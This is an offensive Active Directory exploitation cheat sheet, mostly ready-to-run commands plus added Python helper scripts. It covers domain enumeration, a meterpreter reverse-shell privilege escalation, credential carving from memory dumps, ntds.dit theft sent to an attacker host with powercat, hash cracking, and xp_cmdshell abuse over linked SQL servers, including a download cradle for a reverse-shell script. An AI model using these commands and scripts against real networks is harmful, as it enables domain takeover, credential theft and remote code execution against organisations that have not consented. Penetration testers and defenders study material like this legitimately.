## Active Directory Exploitation Cheat Sheet
Active Directory (AD) is the Microsoft directory service, run on Windows Server, that manages permissions and resources across a network and authenticates and authorizes every user and computer in a Windows domain.
Recent intrusions frequently target the AD services of enterprise networks, where an organization manages thousands of computers from a single point of control, the domain controller (DC). Compromising a DC yields control of the whole domain, which is what makes it a prime target for APT groups.
Exploiting Active Directory is a broad task, so this cheat sheet collects common enumeration and attack commands, grouped into the following phases:
- Recon
- Domain Enum
- Local Privilege Escalation
- User Hunting
- Domain Admin Privileges
- Database Hunting
- Data Exfiltration
- Active Directory Exploitation Tools
The recon phase starts with a port scan. Invoke-Portscan (PowerSploit) covers the common cases: a named host list with the top ports, a single host piped in with explicit ports and grepable output, and a whole subnet with all output formats:
Import-Module .\Invoke-Portscan.ps1
Invoke-Portscan -Hosts "websrv.domain.local,wsus.domain.local,apps.domain.local" -TopPorts 50
echo websrv.domain.local | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080"
Invoke-Portscan -Hosts 172.16.0.0/24 -T 4 -TopPorts 25 -oA localnet
The AD PowerShell module can be used from a system without RSAT installed: the trick is the DLL under C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management on a system that does have RSAT installed.
Set up your own AD VM, install RSAT, extract the DLL and drop it on the system you use to enumerate the target domain. The module talks to the DC over Active Directory Web Services (TCP 9389), the same channel legitimate administration uses, so its queries stand out less than custom LDAP tooling.
Import-Module .\Microsoft.ActiveDirectory.Management.dll
Get-Command get-adcom*
- Get current domain
Get-NetDomain (PowerView)
Get-ADDomain (ActiveDirectory Module)
- Get object of another domain
Get-NetDomain -Domain domain.local
Get-ADDomain -Identity domain.local
- Get domain SID for the current domain
Get-DomainSID
(Get-ADDomain).DomainSID
- Get domain policy for the current domain
Get-DomainPolicy
(Get-DomainPolicy)."system access"
- Get domain policy for another domain
(Get-DomainPolicy -domain domain.local)."system access"
- Get domain controllers for the current domain
Get-NetDomainController
Get-ADDomainController
- Get domain controllers for another domain
Get-NetDomainController -Domain domain.local
Get-ADDomainController -DomainName domain.local -Discover
- Get a list of users in the current domain
Get-NetUser
Get-NetUser -Username student1
Get-NetUser | select -ExpandProperty samaccountname
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity student1 -Properties *
- Get list of all properties for users in the current domain
Get-UserProperty
Get-UserProperty -Properties pwdlastset
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
- Search for a particular string in a user's attributes
Find-UserField -SearchField Description -SearchTerm "built"
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
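The pwdlastset conversion and the description search above are worth automating over a whole user export. The following Python script is an added example (not from the cheat sheet): it converts pwdLastSet FILETIME values the way `[datetime]::fromFileTime` does, flags never-set and stale passwords, and greps description fields for credential-looking text. The SAMPLE_USERS records, the NOW timestamp and the CRED_RE heuristic are constructed for the demonstration.

```python
"""Triage a user export: password age from pwdLastSet and credential-looking
text in description fields.

Added example (Python), not part of the cheat sheet. It performs offline what
`Get-ADUser -Filter * -Properties pwdlastset,description` plus
`[datetime]::fromFileTime()` and `Find-UserField -SearchField Description` do
interactively. SAMPLE_USERS and NOW are constructed for the demo.
"""
import re
from datetime import datetime, timedelta, timezone

# pwdLastSet is a Windows FILETIME: 100 ns ticks since 1601-01-01 00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Credential-looking fragments in description fields ("password: X", "pwd=X", ...).
# Heuristic: expect false positives, review hits by hand.
CRED_RE = re.compile(r"(?i)\b(?:pass(?:word|wd)?|pwd|credentials?|secret)\b\s*(?:[:=]|is)\s*\S+")


def filetime_to_datetime(ft):
    """Convert a FILETIME integer to an aware UTC datetime.
    0 (and negative values) mean 'never set / must change at next logon'."""
    if ft <= 0:
        return None
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime, used here to build sample data."""
    return int((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def triage_users(users, now, max_age_days=365):
    """Return (samaccountname, finding, detail) tuples for every user that has
    a never-set password, a password older than max_age_days, or a
    credential-looking description."""
    findings = []
    for u in users:
        sam = u["samaccountname"]
        last_set = filetime_to_datetime(u.get("pwdlastset", 0))
        if last_set is None:
            findings.append((sam, "password-never-set", "pwdLastSet is 0"))
        elif now - last_set > timedelta(days=max_age_days):
            findings.append((sam, "stale-password", f"set {(now - last_set).days} days ago"))
        m = CRED_RE.search(u.get("description") or "")
        if m:
            findings.append((sam, "credential-in-description", m.group(0)))
    return findings


# Constructed sample export; the reference date matches the lab timeline on this page.
NOW = datetime(2020, 6, 7, tzinfo=timezone.utc)
SAMPLE_USERS = [
    {"samaccountname": "student1",
     "pwdlastset": datetime_to_filetime(datetime(2019, 1, 15, tzinfo=timezone.utc)),
     "description": "Lab account"},
    {"samaccountname": "svc_backup",
     "pwdlastset": datetime_to_filetime(datetime(2020, 5, 1, tzinfo=timezone.utc)),
     "description": "Backup service - password: Summer2020!"},
    {"samaccountname": "Guest", "pwdlastset": 0,
     "description": "Built-in account for guest access to the computer/domain"},
    {"samaccountname": "jdoe",
     "pwdlastset": datetime_to_filetime(datetime(2020, 3, 10, tzinfo=timezone.utc)),
     "description": None},
]

if __name__ == "__main__":
    for sam, finding, detail in triage_users(SAMPLE_USERS, NOW):
        print(f"{sam:<12} {finding:<26} {detail}")
```

To run it against a real domain, export with `Get-ADUser -Filter * -Properties pwdlastset,description | select samaccountname,pwdlastset,description | ConvertTo-Json` and load the JSON into `SAMPLE_USERS`; the FILETIME arithmetic and the regex do not change.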
- Get a list of computers in the current domain
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -Ping
Get-NetComputer -FullData
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADComputer -Filter * -Properties *
- Get all the groups in the current domain
Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter * -Properties *
- Get all groups containing the word "admin" in group name
Get-NetGroup *admin*
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
- Get all the members of the Domain Admins group
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain target.local
- Get the group membership for a user
Get-NetGroup -UserName "john"
Get-ADPrincipalGroupMembership -Identity student1
- List all the local groups on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroup -ComputerName DC01.enumme.local -ListGroups
- Get members of all the local groups on a machine (needs administrator privs on non-dc machines)
Get-NetLocalGroup -ComputerName DC01.enumme.local -Recurse
- Get actively logged users on a computer (needs local admin rights on the target)
Get-NetLoggedon -ComputerName <servername>
- Get locally logged-on users on a computer (needs the Remote Registry service on the target, started by default on server OS)
Get-LoggedonLocal -ComputerName DC01.enumme.local
- Get the last logged user on a computer (needs administrative rights and remote registry on the target)
Get-LastLoggedOn -ComputerName <servername>
- Find shares on hosts in current domain
Invoke-ShareFinder -Verbose
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose
- Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose
- Get all fileservers of the domain
Get-NetFileServer
Local privilege escalation: autorun program with a world-writable binary
Windows VM
- Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
- In Autoruns, click on the ‘Logon’ tab.
- From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”.
- In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
- From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “program.exe” file.
Kali VM
- Open a terminal and type: msfconsole
- In Metasploit (msf > prompt) type: use multi/handler
- In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
- In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
- In Metasploit (msf > prompt) type: run
- Open a second terminal and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
- Copy the generated file, program.exe, to the Windows VM.
Windows VM
- Place program.exe in ‘C:\Program Files\Autorun Program’.
- To simulate the privilege escalation effect, logoff and then log back on as an administrator user.
Kali VM
- Wait for a new session to open in Metasploit.
- In Metasploit (msf > prompt) type: sessions -i [Session ID]
- To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid
Local privilege escalation: credentials recovered from a process memory dump
Kali VM
- Open a terminal and type: msfconsole
- In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
- In Metasploit (msf > prompt) type: set uripath x
- In Metasploit (msf > prompt) type: run
Windows VM
- Open Internet Explorer and browse to: http://[Kali VM IP Address]/x
- Open command prompt and type: taskmgr
- In Windows Task Manager, right-click “iexplore.exe” in the “Image Name” column and select “Create Dump File” from the popup menu.
- Copy the generated file, iexplore.DMP, to the Kali VM.
Kali VM
- Place 'iexplore.DMP' on the desktop.
- Open a terminal and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
- Copy the Base64-encoded string that follows "Authorization: Basic" in the output.
- In the terminal type: echo -ne '[Base64 String]' | base64 -d
- Notice the credentials in the output.
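The strings/grep/base64 steps above recover one header by hand. The added Python example below (not part of the cheat sheet) carves every Basic header out of a dump in one pass, skips corrupted tokens and de-duplicates the results. The DUMP bytes are constructed to stand in for iexplore.DMP; `carve_file()` points the same logic at a real dump.

```python
"""Carve HTTP Basic credentials out of a process memory dump.

Added example (Python), not part of the cheat sheet. It replaces the manual
`strings | grep "Authorization: Basic"` and `base64 -d` steps with one pass
that handles several headers, surrounding binary garbage and malformed
tokens. DUMP is a constructed stand-in for iexplore.DMP.
"""
import base64
import binascii
import re

# Basic credentials are base64("user:password") (RFC 7617). In a raw dump the
# header is rarely line-terminated, so match on the base64 alphabet itself.
BASIC_RE = re.compile(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/]+={0,2})")


def carve_basic_creds(blob):
    """Return sorted unique (username, password) pairs found in blob."""
    creds = set()
    for m in BASIC_RE.finditer(blob):
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue  # truncated or overwritten token
        if b":" not in decoded:
            continue  # not a user:password pair
        user, _, password = decoded.partition(b":")
        creds.add((user.decode("latin-1"), password.decode("latin-1")))
    return sorted(creds)


def carve_file(path):
    """Convenience wrapper, e.g. carve_file('/root/Desktop/iexplore.DMP')."""
    with open(path, "rb") as fh:
        return carve_basic_creds(fh.read())


# Constructed dump fragment: two valid headers (one duplicated), one with an
# invalid base64 token, one whose payload has no colon.
DUMP = b"".join([
    b"MZ\x90\x00\x03garbage\x00\x00",
    b"GET /x HTTP/1.1\r\nHost: 10.10.10.10\r\nAuthorization: Basic ",
    base64.b64encode(b"admin:Winter2020!"), b"\r\n\x00\x00",
    b"Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\x00",  # RFC 7617 example value
    b"Authorization: Basic QUJDR\x00",                          # bad padding, skipped
    b"Authorization: Basic ", base64.b64encode(b"nocolonhere"), b"\x00",
    b"Authorization: Basic ", base64.b64encode(b"admin:Winter2020!"), b"\x00",
])

if __name__ == "__main__":
    for user, password in carve_basic_creds(DUMP):
        print(f"{user}:{password}")
```

Matching on the base64 alphabet rather than on whitespace matters in a dump: the header is often followed directly by other data, so `strings` output may glue unrelated bytes onto the token, and `validate=True` then rejects it instead of decoding garbage.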
Domain admin privileges and user hunting
- Find all machines on the current domain where the current user has local admin access (Get-NetComputer + Invoke-CheckLocalAdminAccess)
Find-LocalAdminAccess -Verbose
- Find Administrative access
. .\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
# No Stateful
Enter-PSSession -ComputerName targetcomputer.target.domain.local
# Stateful
$sess = New-Pssession -ComputerName targetcomputer.target.domain.local
Enter-Pssession -session $sess
- If RPC and SMB are blocked check with WMI
. .\Find-WMILocalAdminAccess.ps1
- Find local admins on all machines of the domain (Get-NetComputer + Get-NetLocalGroup)
Invoke-EnumerateLocalAdmin -Verbose
- Find computers where a domain admin (or specified user/group) has sessions
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
- Confirm admin access
Invoke-UserHunter -CheckAccess
- Find computers where a domain admin is logged-in ( Get-NetSession / Get-NetLoggedon )
Invoke-UserHunter -Stealth
- Wait for an incoming session: poll the target until the named user logs on
Invoke-UserHunter -ComputerName targetserver -Poll 100 -UserName Administrator -Delay 5 -Verbose
Data exfiltration: dumping the AD database (ntds.dit)
Method 1: ntdsutil on the DC (needs Domain Admin or equivalent)
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
Method 2: copy ntds.dit from a volume shadow copy with vssadmin (elevated cmd.exe on the DC)
mkdir c:\extract
vssadmin create shadow /for=c:
REM use the "Shadow Copy Volume Name" printed by the command above; the HarddiskVolumeShadowCopyN number varies
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\ntds.dit c:\extract\ntds.dit
REM the SYSTEM hive holds the boot key needed to decrypt ntds.dit
reg SAVE HKLM\SYSTEM c:\extract\SYS
REM exfiltrate c:\extract to the attacker machine
REM housekeeping: remove the shadow copy using the Shadow Copy ID printed by "vssadmin create shadow"
vssadmin delete shadows /shadow={ShadowCopyID} /Quiet
Method 3: diskshadow plus SeBackupPrivilege (works for members of Backup Operators, who can read any file without being administrators)
# Create script.txt containing the diskshadow commands below
#Script ->{
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
#}
# TRANSFER TO TARGET SYSTEM
Invoke-WebRequest -Uri "http://10.10.10.10/script.txt" -OutFile "C:\windows\system32\spool\drivers\color\script.txt"
# EXEC DISKSHADOW
cd C:\windows\system32\spool\drivers\color
diskshadow.exe -s script.txt
# CHECK THE CAB
ls
-a---- 6/7/2020 9:31 PM 743 example.cab
# IMPORT THE SeBackupPrivilegeCmdLets AND SeBackupPrivilegeUtils DLLS
Invoke-WebRequest -Uri "http://10.10.10.10/SeBackupPrivilegeCmdLets.dll" -OutFile "C:\windows\system32\spool\drivers\color\SeBackupPrivilegeCmdLets.dll"
Invoke-WebRequest -Uri "http://10.10.10.10/SeBackupPrivilegeUtils.dll" -OutFile "C:\windows\system32\spool\drivers\color\SeBackupPrivilegeUtils.dll"
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
# CHECK MODULE
get-help SeBackupPrivilege
Name Category Module Synopsis
---- -------- ------ --------
Get-SeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...
Set-SeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...
Copy-FileSeBackupPrivilege Cmdlet SeBackupPrivilegeCmdLets ...
#Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\Windows\temp\ntds.dit -Overwrite
# Dump the live SYSTEM hive (its boot key is needed to decrypt ntds.dit)
reg.exe save HKLM\SYSTEM c:\Windows\temp\system.hive
# FILE TRANSFER (powercat client mode: sends each file to a listener on the attacker machine)
powercat -c 10.10.10.10 -p 443 -i c:\Windows\temp\system.hive
powercat -c 10.10.10.10 -p 443 -i c:\Windows\temp\ntds.dit
Parse the extracted files offline with impacket's secretsdump.py:
- -ntds: path to the ntds.dit file
- -system: path to the SYSTEM hive (supplies the boot key)
- LOCAL: parse the files on the local system instead of dumping a remote target; no credentials are needed (-hashes LMHASH:NTHASH only applies when authenticating to a remote target)
- -outputfile: base name of the output files; extensions (.ntds, .ntds.kerberos, .ntds.cleartext) are added based on the content extracted
# impacket
secretsdump.py -ntds ntds.dit -system SYS LOCAL -outputfile ntlm-extract
GPU setup on the cracking box (optional; hashcat also runs on CPU, far more slowly)
apt install -y nvidia-driver nvidia-cuda-toolkit
apt install -y mesa-utils
# CHECK
nvidia-smi
# CHECK
nvidia-smi -i 0 -q
# CHECK
glxinfo | grep -i "direct rendering"
Crack the NT hashes with hashcat:
- -m 1000: hashcat mode for NTLM (the NT hash from the .ntds output)
- --username: the .ntds file is in pwdump format (user:rid:lmhash:nthash:::), so tell hashcat to skip the account fields; `--show --username` later re-prints cracked results with the account name attached
- ntlm-extract.ntds: secretsdump output file
- /usr/share/wordlists/rockyou.txt: plaintext wordlist
- -o: file to write cracked hash:plaintext pairs to
hashcat -m 1000 --username ntlm-extract.ntds /usr/share/wordlists/rockyou.txt -o cracked
cat cracked
Database hunting. Tool: PowerUpSQL
Import-Module .\PowerupSQL.psd1
Get-SQLInstanceLocal -Verbose
Get-SQLInstanceBroadcast -Verbose
Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1
Get-SQLInstanceFile -FilePath c:\temp\computers.txt | Get-SQLInstanceScanUDPThreaded -Verbose
runas /noprofile /netonly /user:domain\user PowerShell.exe
import-module PowerUpSQL.psd1
Get-SQLInstanceDomain -Verbose -DomainController 172.16.0.1 -Username domain\user -password 'P@ssword123'
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Get-SQLServerLink -Instance db-mssql -Verbose
Get-SQLServerLinkCrawl -Instance db-mssql -Verbose
Get-SQLInstanceDomain -Verbose -DomainAccount SQLSvc
Get-SQLInstanceDomain -Verbose | Group-Object DomainAccount | Sort-Object count -Descending | select Count,Name | Where-Object {($_.name -notlike "*$") -and ($_.count -gt 1) }
Get-SQLQuery -Verbose -Instance "10.2.2.5,1433"
# Server and Instance Name
Get-SQLQuery -Verbose -Instance "servername\instancename" -username testuser -password testpass
# IP and Instance Name
Get-SQLQuery -Verbose -Instance "10.2.2.5\instancename" -username testuser -password testpass
# IP and Port
Get-SQLQuery -Verbose -Instance "10.2.2.5,1433" -username testuser -password testpass
Get-SQLServerInfo -Verbose -Instance SQLServer1\Instance1
#
$ServerInfo = Get-SQLInstanceDomain | Get-SQLServerInfoThreaded -Verbose -Threads 10
$ServerInfo
Get an inventory of common objects from the remote server including permissions, databases, tables, views etc, and dump them out into CSV files.
Invoke-SQLDumpInfo -Verbose -Instance Server1\Instance1
Invoke-SQLAudit -Verbose -Instance SQLServer1
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20
Get-SQLServerLinkCrawl -Instance db-mssql -Query "sp_configure 'show advanced options', '1'"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "RECONFIGURE"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "sp_configure 'xp_cmdshell', '1'"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "RECONFIGURE"
Get-SQLQuery -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "msqlsrv.domain.local"'
Get-SQLServerLinkCrawl -Instance DOMAIN\SQLEXPRESS -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "msqlsrv.domain.local"'
osql -E -S "db-mssql" -Q "EXECUTE('sp_configure ''xp_cmdshell'',1;RECONFIGURE;') AT [msqlsrv.domain.local]"
Get-SQLServerLinkCrawl -Instance db-mssql -Query "exec master..xp_cmdshell 'whoami'"
Get-SQLServerLinkCrawl -Instance db-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.10:1433/revshell_FUD.ps1'')"'
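The quoting in the EXECUTE ... AT one-liners above is the usual failure point: each hop adds a level of single-quote doubling, and PowerShell's own single-quoted string adds one more. The added Python helper below (not part of the cheat sheet or PowerUpSQL) generates the statement for any chain of links; with one hop it reproduces the osql command above exactly, and with two hops it shows the quadrupled quotes you would otherwise have to count by hand. The server name msqlsrv.domain.local is taken from the page; srv-a and srv-b are placeholders.

```python
"""Build correctly quoted T-SQL for running a statement across one or more
linked servers with EXECUTE(...) AT, plus the PowerShell literal to pass it in.

Added example (Python), not part of the cheat sheet or PowerUpSQL. Every hop
wraps the statement in another single-quoted literal, so each level doubles
the quotes of the level below.
"""


def quote_tsql(s):
    """Escape s for use inside a T-SQL single-quoted string literal."""
    return s.replace("'", "''")


def xp_cmdshell_stmt(command):
    """EXEC master..xp_cmdshell '<command>' with the command quoted."""
    return f"EXEC master..xp_cmdshell '{quote_tsql(command)}'"


def enable_xp_cmdshell_stmt():
    """Turn on xp_cmdshell; needs sysadmin on the target via the link login,
    and 'show advanced options' must be enabled first."""
    return ("sp_configure 'show advanced options',1;RECONFIGURE;"
            "sp_configure 'xp_cmdshell',1;RECONFIGURE;")


def linked_exec(statement, link_path):
    """Wrap statement so it runs on the last server in link_path.

    link_path lists linked-server names from the server you are connected to
    outward: ["srv-a", "srv-b"] means srv-a runs "EXECUTE(...) AT [srv-b]".
    EXECUTE AT requires 'RPC Out' to be enabled on each link it crosses."""
    stmt = statement
    for link in reversed(link_path):
        stmt = f"EXECUTE('{quote_tsql(stmt)}') AT [{link}]"
    return stmt


def powershell_literal(s):
    """Wrap s in a PowerShell single-quoted string (quotes doubled again) for -Query."""
    return "'" + s.replace("'", "''") + "'"


if __name__ == "__main__":
    one_hop = ["msqlsrv.domain.local"]
    # Same statement as the osql -Q "..." command on this page.
    print(linked_exec("sp_configure 'xp_cmdshell',1;RECONFIGURE;", one_hop))
    # Ready to paste after Get-SQLQuery -Instance db-mssql -Query
    print(powershell_literal(linked_exec(xp_cmdshell_stmt("whoami"), one_hop)))
    # Two hops: the inner command now carries four quotes around 'whoami'.
    print(linked_exec(xp_cmdshell_stmt("whoami"), ["srv-a", "srv-b"]))
```

When a crawl fails with a syntax error near a quote, regenerate the statement with this helper rather than editing quotes in place; a missing or extra quote at the inner level only surfaces as an error on the remote server, which makes it hard to spot from the caller's side.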
Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "credit,ssn,password" -SampleSize 2 -ValidateCC -NoDefaults
Get-SQLInstanceDomain | Get-SQLConnectionTest | Get-SQLDatabaseThreaded -Verbose -Threads 10 -NoDefaults | Where-Object {$_.is_encrypted -eq "TRUE"} | Get-SQLColumnSampleDataThreaded -Verbose -Threads 10 -Keyword "card, password" -SampleSize 2 -ValidateCC -NoDefaults
Get-SQLServerPasswordHash -Verbose -Instance MSSQLSERVER2016\db-mssql -Migrate